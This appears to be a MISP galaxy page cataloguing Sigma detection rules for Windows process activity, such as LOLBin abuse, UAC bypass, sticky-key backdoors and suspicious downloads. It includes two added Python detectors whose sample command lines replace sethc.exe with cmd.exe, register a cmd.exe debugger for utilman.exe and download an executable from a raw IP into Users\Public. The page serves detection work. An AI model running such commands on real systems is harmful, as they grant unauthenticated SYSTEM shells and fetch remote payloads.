Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.

Internal MISP references

UUID 94771a71-ba41-4b6e-a757-b531372eaab6 which can be used as unique global reference for File Download From Browser Process Via Inline URL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/11
falsepositive ['Unknown']
filename proc_creation_win_browsers_inline_file_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Add Potential Suspicious New Download Source To Winget

Detects usage of winget to add new, potentially suspicious download sources.

Internal MISP references

UUID c15a46a0-07d4-4c87-b4b6-89207835a83b which can be used as unique global reference for Add Potential Suspicious New Download Source To Winget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/17
falsepositive ['Unknown']
filename proc_creation_win_winget_add_susp_custom_source.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059']

DLL Execution via Rasautou.exe

Detects the use of Rasautou.exe to load an arbitrary DLL specified with the -d option and execute the export specified with the -p option.

Internal MISP references

UUID cd3d1298-eb3b-476c-ac67-12847de55813 which can be used as unique global reference for DLL Execution via Rasautou.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/09
falsepositive ['Unlikely']
filename proc_creation_win_lolbin_rasautou_dll_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Enumeration for Credentials in Registry

Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services.

Internal MISP references

UUID e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 which can be used as unique global reference for Enumeration for Credentials in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/20
falsepositive ['Unknown']
filename proc_creation_win_reg_enumeration_for_credentials_in_registry.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.002']

Suspicious VBoxDrvInst.exe Parameters

Detects VBoxDrvInst.exe run with parameters that allow processing of an INF file. This allows creating values in the registry and installing drivers. For example, one could use this technique to obtain persistence by modifying one of the Run or RunOnce registry keys.

Internal MISP references

UUID b7b19cb6-9b32-4fc4-a108-73f19acfe262 which can be used as unique global reference for Suspicious VBoxDrvInst.exe Parameters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Konstantin Grishchenko, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process']
filename proc_creation_win_virtualbox_vboxdrvinst_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Base64 MZ Header In CommandLine

Detects a base64-encoded MZ header in the command line.

Internal MISP references

UUID 22e58743-4ac8-4a9f-bf19-00a0428d8c5f which can be used as unique global reference for Base64 MZ Header In CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/12
falsepositive ['Unlikely']
filename proc_creation_win_susp_inline_base64_mz_header.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious File Download From IP Via Wget.EXE

Detects potentially suspicious file downloads directly from IP addresses using Wget.exe.

Internal MISP references

UUID 17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35 which can be used as unique global reference for Suspicious File Download From IP Via Wget.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/27
falsepositive ['Unknown']
filename proc_creation_win_wget_download_direct_ip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Scheduled Task Creation Via Schtasks.EXE

Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.

Internal MISP references

UUID 92626ddd-662c-49e3-ac59-f6535f12d189 which can be used as unique global reference for Scheduled Task Creation Via Schtasks.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Administrative activity', 'Software installation']
filename proc_creation_win_schtasks_creation.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1053.005', 'attack.s0111', 'car.2013-08-001', 'stp.1u']
Related clusters

To see the related clusters, click here.

HackTool - SharpMove Tool Execution

Detects the execution of SharpMove, a .NET lateral-movement utility that performs tasks such as scheduled task creation, SCM queries and VBScript execution via WMI, by matching on its PE metadata and command-line options.

Internal MISP references

UUID 055fb54c-a8f4-4aee-bd44-f74cf30a0d9d which can be used as unique global reference for HackTool - SharpMove Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Luca Di Bartolomeo (CrimpSec)
creation_date 2024/01/29
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpmove.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Suspicious Serv-U Process Pattern

Detects a suspicious process pattern which could be a sign of an exploited Serv-U service

Internal MISP references

UUID 58f4ea09-0fc2-4520-ba18-b85c540b0eaf which can be used as unique global reference for Suspicious Serv-U Process Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/14
falsepositive ['Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution']
filename proc_creation_win_servu_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1555', 'cve.2021.35211']
Related clusters

To see the related clusters, click here.

Suspicious Where Execution

Detects suspicious use of the "where" utility to locate browser data files on the host. Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Internal MISP references

UUID 725a9768-0f5e-4cb3-aec2-bc5719c6831a which can be used as unique global reference for Suspicious Where Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/13
falsepositive ['Unknown']
filename proc_creation_win_where_browser_data_recon.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1217']
Related clusters

To see the related clusters, click here.

Whoami Utility Execution

Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation

Internal MISP references

UUID e28a5a99-da44-436d-b7a0-2afc20a5f413 which can be used as unique global reference for Whoami Utility Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/08/13
falsepositive ['Admin activity', 'Scripts and administrative tools used in the monitored environment', 'Monitoring activity']
filename proc_creation_win_whoami_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

HackTool - WinPwn Execution

Detects command-line keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.

Internal MISP references

UUID d557dc06-62e8-4468-a8e8-7984124908ce which can be used as unique global reference for HackTool - WinPwn Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/12/04
falsepositive ['Unknown']
filename proc_creation_win_hktl_winpwn.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.discovery', 'attack.execution', 'attack.privilege_escalation', 'attack.t1046', 'attack.t1082', 'attack.t1106', 'attack.t1518', 'attack.t1548.002', 'attack.t1552.001', 'attack.t1555', 'attack.t1555.003']
Related clusters

To see the related clusters, click here.

Potential NTLM Coercion Via Certutil.EXE

Detects possible NTLM coercion via certutil using the 'syncwithWU' flag

Internal MISP references

UUID 6c6d9280-e6d0-4b9d-80ac-254701b64916 which can be used as unique global reference for Potential NTLM Coercion Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/01
falsepositive ['Unknown']
filename proc_creation_win_certutil_ntlm_coercion.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Visual Studio Code Tunnel Execution

Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel

Internal MISP references

UUID 90d6bd71-dffb-4989-8d86-a827fedd6624 which can be used as unique global reference for Visual Studio Code Tunnel Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), citron_ninja
creation_date 2023/10/25
falsepositive ['Legitimate use of Visual Studio Code tunnel']
filename proc_creation_win_vscode_tunnel_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Sdclt Child Processes

A general detection for sdclt.exe spawning new processes, which could indicate that sdclt is being used in a UAC bypass technique.

Internal MISP references

UUID da2738f2-fadb-4394-afa7-0a0674885afa which can be used as unique global reference for Sdclt Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unknown']
filename proc_creation_win_sdclt_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Windows Binary Executed From WSL

Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships

Internal MISP references

UUID ed825c86-c009-4014-b413-b76003e33d35 which can be used as unique global reference for Windows Binary Executed From WSL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/14
falsepositive ['Unknown']
filename proc_creation_win_wsl_windows_binaries_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

HackTool - Wmiexec Default Powershell Command

Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script

Internal MISP references

UUID 022eaba8-f0bf-4dd9-9217-4604b0bb3bb0 which can be used as unique global reference for HackTool - Wmiexec Default Powershell Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/08
falsepositive ['Unlikely']
filename proc_creation_win_hktl_wmiexec_default_powershell.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.lateral_movement']

Potential SquiblyTwo Technique Execution

Detects a potential SquiblyTwo attack technique, including a possibly renamed WMIC binary identified via the Imphash and OriginalFileName fields.

Internal MISP references

UUID 8d63dadf-b91b-4187-87b6-34a1114577ea which can be used as unique global reference for Potential SquiblyTwo Technique Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Florian Roth
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_wmic_squiblytwo_bypass.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1047', 'attack.t1220', 'attack.execution', 'attack.t1059.005', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

Forfiles Command Execution

Detects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting.

Internal MISP references

UUID 9aa5106d-bce3-4b13-86df-3a20f1d5cf0b which can be used as unique global reference for Forfiles Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2022/06/14
falsepositive ['Legitimate use via a batch script or by an administrator.']
filename proc_creation_win_forfiles_proxy_execution_.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious Invoke-WebRequest Execution

Detects a suspicious call to the Invoke-WebRequest cmdlet where the output file is written to a suspicious location.

Internal MISP references

UUID 5e3cc4d8-3e68-43db-8656-eaaeefdec9cc which can be used as unique global reference for Suspicious Invoke-WebRequest Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/02
falsepositive ['Unknown']
filename proc_creation_win_powershell_invoke_webrequest_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.
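The two download rules in this section, "Suspicious File Download From IP Via Wget.EXE" and "Suspicious Invoke-WebRequest Execution", share the same two signals: a URL whose host is a literal IP address, and an output path in a user-writable drop directory. The following added example (not the Sigma rules' own logic and not part of the MISP galaxy) evaluates both signals over constructed command lines; the directory list, the parameter patterns and the samples are assumptions made for the example, and the IP addresses are from the documentation ranges.

```python
import ipaddress
import re
from typing import Optional
from urllib.parse import urlparse

# Added example covering the wget.exe direct-IP rule and the Invoke-WebRequest rule.
# Illustrative code, not the Sigma rules' own logic and not part of the MISP galaxy;
# the directory list and the samples are assumptions constructed for this example.

# Writable, rarely-legitimate drop locations (lower-case, backslash-delimited substrings).
SUSPICIOUS_DIRS = (
    "\\users\\public\\", "\\appdata\\", "\\temp\\", "\\programdata\\",
    "\\windows\\temp\\", "\\perflogs\\", "\\$recycle.bin\\", "\\desktop\\",
)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
# -OutFile may be abbreviated (-OutF, -OutFi, ...); wget uses -O or --output-document.
PS_OUTFILE_RE = re.compile(r"-OutF\w*\s+[\"']?([^\"'\s]+)", re.I)
WGET_OUTFILE_RE = re.compile(r"(?:-O\s+|--output-document[=\s])[\"']?([^\"'\s]+)")
DOWNLOAD_KEYWORDS = ("wget", "invoke-webrequest", "iwr ")


def host_is_ip(url: str) -> bool:
    """True when the URL host is a literal IPv4/IPv6 address (urlparse strips port and brackets)."""
    host = urlparse(url).hostname
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def output_path(cmdline: str) -> Optional[str]:
    """Output file named on the command line, PowerShell form first, then wget form."""
    m = PS_OUTFILE_RE.search(cmdline) or WGET_OUTFILE_RE.search(cmdline)
    return m.group(1) if m else None


def assess_download(cmdline: str) -> Optional[dict]:
    """Return None for non-download command lines, else the URLs, output path and flags."""
    low = cmdline.lower()
    if not any(k in low for k in DOWNLOAD_KEYWORDS):
        return None
    urls = URL_RE.findall(cmdline)
    out = output_path(cmdline)
    flags = []
    if any(host_is_ip(u) for u in urls):
        flags.append("direct_ip_download")
    if out and any(d in out.lower() for d in SUSPICIOUS_DIRS):
        flags.append("suspicious_output_path")
    return {"urls": urls, "outfile": out, "flags": flags}


# Constructed sample command lines (not real telemetry; 203.0.113.0/24 and 2001:db8::/32
# are documentation ranges).
SAMPLE_COMMAND_LINES = [
    r"wget.exe http://203.0.113.10/update.exe -O C:\Users\Public\update.exe",
    r'powershell.exe -nop -c "Invoke-WebRequest -Uri http://cdn.example.com/agent.ps1 -OutFile C:\Users\bob\AppData\Local\Temp\a.ps1"',
    r'powershell.exe -c "iwr https://[2001:db8::1]:8443/x.bin -OutFile C:\ProgramData\x.bin"',
    r"wget.exe https://downloads.example.com/tool.zip -O C:\Tools\tool.zip",
    r"notepad.exe C:\Users\bob\notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(assess_download(line), "<-", line[:50])
```

Resolving the host with `urlparse` rather than a regex is what makes the bracketed IPv6 case and the `host:port` case behave; a `\d+\.\d+\.\d+\.\d+` pattern misses the former and false-positives on version strings in paths.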

UAC Bypass Using Consent and Comctl32 - Process

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

Internal MISP references

UUID 1ca6bd18-0ba0-44ca-851c-92ed89a61085 which can be used as unique global reference for UAC Bypass Using Consent and Comctl32 - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_consent_comctl32.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Ie4uinit Lolbin Use From Invalid Path

Detects the use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file located in a directory other than the usual ones.

Internal MISP references

UUID d3bf399f-b0cf-4250-8bb4-dfc192ab81dc which can be used as unique global reference for Ie4uinit Lolbin Use From Invalid Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/07
falsepositive ['ViberPC updater calls this binary with the following commandline "ie4uinit.exe -ClearIconCache"']
filename proc_creation_win_lolbin_ie4uinit.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

NtdllPipe Like Activity Execution

Detects commands that type or redirect the content of ntdll.dll into a different file or a named pipe in order to obtain a copy of the library outside of AV/EDR user-mode hooks and evade detection, as used in the NtdllPipe proof of concept.

Internal MISP references

UUID bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2 which can be used as unique global reference for NtdllPipe Like Activity Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/05
falsepositive ['Unknown']
filename proc_creation_win_cmd_ntdllpipe_redirect.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Security Service Disabled Via Reg.EXE

Detects execution of "reg.exe" to disable security services such as Windows Defender.

Internal MISP references

UUID 5e95028c-5229-4214-afae-d653d573d0ec which can be used as unique global reference for Security Service Disabled Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), John Lambert (idea), elhoim
creation_date 2021/07/14
falsepositive ['Unlikely']
filename proc_creation_win_reg_disable_sec_services.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

PUA - Mouse Lock Execution

In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.

Internal MISP references

UUID c9192ad9-75e5-43eb-8647-82a0a5b493e3 which can be used as unique global reference for PUA - Mouse Lock Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cian Heasley
creation_date 2020/08/13
falsepositive ['Legitimate uses of Mouse Lock software']
filename proc_creation_win_pua_mouselock_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.collection', 'attack.t1056.002']
Related clusters

To see the related clusters, click here.

Firewall Rule Update Via Netsh.EXE

Detects execution of netsh with the "advfirewall" and "set" options in order to set new values for properties of an existing rule.

Internal MISP references

UUID a70dcb37-3bee-453a-99df-d0c683151be6 which can be used as unique global reference for Firewall Rule Update Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/18
falsepositive ['Legitimate administration activity', 'Software installations and removal']
filename proc_creation_win_netsh_fw_set_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Exports Registry Key To a File

Detects the export of the target Registry key to a file.

Internal MISP references

UUID f0e53e89-8d22-46ea-9db5-9d4796ee2f8a which can be used as unique global reference for Exports Registry Key To a File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Oddvar Moe, Sander Wiebing, oscd.community
creation_date 2020/10/07
falsepositive ['Legitimate export of keys']
filename proc_creation_win_regedit_export_keys.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1012']
Related clusters

To see the related clusters, click here.

Weak or Abused Passwords In CLI

Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline

Internal MISP references

UUID 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 which can be used as unique global reference for Weak or Abused Passwords In CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/14
falsepositive ['Legitimate usage of the passwords by users via commandline (should be discouraged)', 'Other currently unknown false positives']
filename proc_creation_win_susp_weak_or_abused_passwords.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

Persistence Via Sticky Key Backdoor

By replacing the Sticky Keys executable (sethc.exe) with a copy of cmd.exe, an attacker can obtain a privileged Windows console session from the logon screen without authenticating: when Sticky Keys is activated, the privileged shell is launched instead.

Internal MISP references

UUID 1070db9a-3e5d-412e-8e7b-7183b616e1b3 which can be used as unique global reference for Persistence Via Sticky Key Backdoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/02/18
falsepositive ['Unlikely']
filename proc_creation_win_cmd_sticky_keys_replace.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.t1546.008', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Sticky Key Like Backdoor Execution

Detects the installation and use of a backdoor that registers a malicious debugger (via Image File Execution Options) for built-in accessibility tools that are reachable from the logon screen.

Internal MISP references

UUID 2fdefcb3-dbda-401e-ae23-f0db027628bc which can be used as unique global reference for Sticky Key Like Backdoor Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
creation_date 2018/03/15
falsepositive ['Unlikely']
filename proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1546.008', 'car.2014-11-003', 'car.2014-11-008']
Related clusters

To see the related clusters, click here.
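The two entries above describe the same backdoor reached by two routes: overwriting an accessibility binary with a shell, or registering a debugger for it under Image File Execution Options. The following added example (not the Sigma rules' own logic and not part of the MISP galaxy) recognises both variants in process command lines. The lists of accessibility binaries and shells, the verb list and the sample command lines are assumptions constructed for the example.

```python
import re
from typing import Optional

# Added example for the two sticky-key rules. Illustrative code, not the Sigma rules'
# own logic and not part of the MISP galaxy; the binary lists and samples are assumptions.

# Accessibility helpers that can be launched from the Windows logon screen.
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}
# Binaries an attacker swaps in to get a SYSTEM shell at the logon screen.
SHELL_BINARIES = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}
COPY_VERBS = {"copy", "xcopy", "move", "ren", "rename", "copy-item", "move-item", "rename-item"}
IFEO_KEY = "currentversion\\image file execution options\\"


def basename(path: str) -> str:
    """Last path component, tolerating either separator and stray quotes."""
    return re.split(r"[\\/]", path.strip("'\""))[-1]


def detect_sticky_key_backdoor(cmdline: str) -> Optional[str]:
    """Return 'binary_replacement', 'ifeo_debugger' or None for one process command line."""
    low = cmdline.lower()

    # Variant 2: an IFEO Debugger value registered for an accessibility binary.
    if IFEO_KEY in low and "debugger" in low:
        if any(IFEO_KEY + name in low for name in ACCESSIBILITY_BINARIES):
            return "ifeo_debugger"

    # Variant 1: a shell copied/moved/renamed over an accessibility binary. Tokenise without
    # quotes, find the verb, then take the next two non-switch tokens as source and destination.
    tokens = low.replace('"', " ").replace("'", " ").split()
    for idx, tok in enumerate(tokens):
        if tok not in COPY_VERBS:
            continue
        args = [t for t in tokens[idx + 1:] if not t.startswith(("/", "-"))][:2]
        if (len(args) == 2 and basename(args[0]) in SHELL_BINARIES
                and basename(args[1]) in ACCESSIBILITY_BINARIES):
            return "binary_replacement"
    return None


# Constructed sample command lines (not real telemetry).
SAMPLE_COMMAND_LINES = [
    r"cmd.exe /c copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe",
    r'reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f',
    r'powershell.exe -c "Copy-Item C:\Windows\System32\cmd.exe C:\Windows\System32\osk.exe -Force"',
    r"cmd.exe /c copy C:\Windows\System32\sethc.exe C:\Backup\sethc.exe",      # benign backup
    r'reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d vsjitdebugger.exe /f',  # benign IFEO
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(detect_sticky_key_backdoor(line), "<-", line[:60])
```

Checking that the shell is the source and the accessibility binary the destination is what keeps a backup copy of sethc.exe from firing. Two caveats: on current Windows versions the overwrite only succeeds after ownership of the target has been taken (takeown/icacls), so those commands against the same binaries are a natural companion rule, and a replacement done from offline boot media never appears in process telemetry at all; file-integrity or IFEO registry monitoring covers that gap.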

WmiPrvSE Spawned A Process

Detects WmiPrvSE spawning a process

Internal MISP references

UUID d21374ff-f574-44a7-9998-4a8c8bf33d7d which can be used as unique global reference for WmiPrvSE Spawned A Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/15
falsepositive ['False positives are expected (e.g. in environments where WinRM is used legitimately)']
filename proc_creation_win_wmiprvse_spawning_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

XSL Script Execution Via WMIC.EXE

Detects the execution of WMIC with the "format" flag to potentially load XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.

Internal MISP references

UUID 05c36dd6-79d6-4a9a-97da-3db20298ab2d which can be used as unique global reference for XSL Script Execution Via WMIC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel
creation_date 2019/10/21
falsepositive ['WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.', 'Static format arguments - https://petri.com/command-line-wmi-part-3']
filename proc_creation_win_wmic_xsl_script_processing.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1220']
Related clusters

To see the related clusters, click here.

Suspicious Regsvr32 Execution From Remote Share

Detects regsvr32.exe executing a DLL hosted on a remote share.

Internal MISP references

UUID 88a87a10-384b-4ad7-8871-2f9bf9259ce5 which can be used as unique global reference for Suspicious Regsvr32 Execution From Remote Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/31
falsepositive ['Unknown']
filename proc_creation_win_regsvr32_remote_share.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Abuse of Service Permissions to Hide Services Via Set-Service

Detects usage of the "Set-Service" PowerShell cmdlet to configure a new security descriptor that hides a service from other utilities such as "sc.exe", "Get-Service" etc. (the required -SecurityDescriptorSddl parameter exists only in PowerShell 7).

Internal MISP references

UUID 514e4c3a-c77d-4cde-a00f-046425e2301e which can be used as unique global reference for Abuse of Service Permissions to Hide Services Via Set-Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/17
falsepositive ['Rare intended use of hidden services']
filename proc_creation_win_powershell_hide_services_via_set_service.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

Renamed Plink Execution

Detects the execution of a renamed version of the Plink binary

Internal MISP references

UUID 1c12727d-02bf-45ff-a9f3-d49806a3cf43 which can be used as unique global reference for Renamed Plink Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/06
falsepositive ['Unknown']
filename proc_creation_win_renamed_plink.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

PUA - NPS Tunneling Tool Execution

Detects the use of NPS, a port forwarding and intranet penetration proxy server

Internal MISP references

UUID 68d37776-61db-42f5-bf54-27e87072d17e which can be used as unique global reference for PUA - NPS Tunneling Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/08
falsepositive ['Legitimate use']
filename proc_creation_win_pua_nps.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

MMC Spawning Windows Shell

Detects a Windows command line executable started from MMC

Internal MISP references

UUID 05a2ab7e-ce11-4b63-86db-ab32e763e11d which can be used as unique global reference for MMC Spawning Windows Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
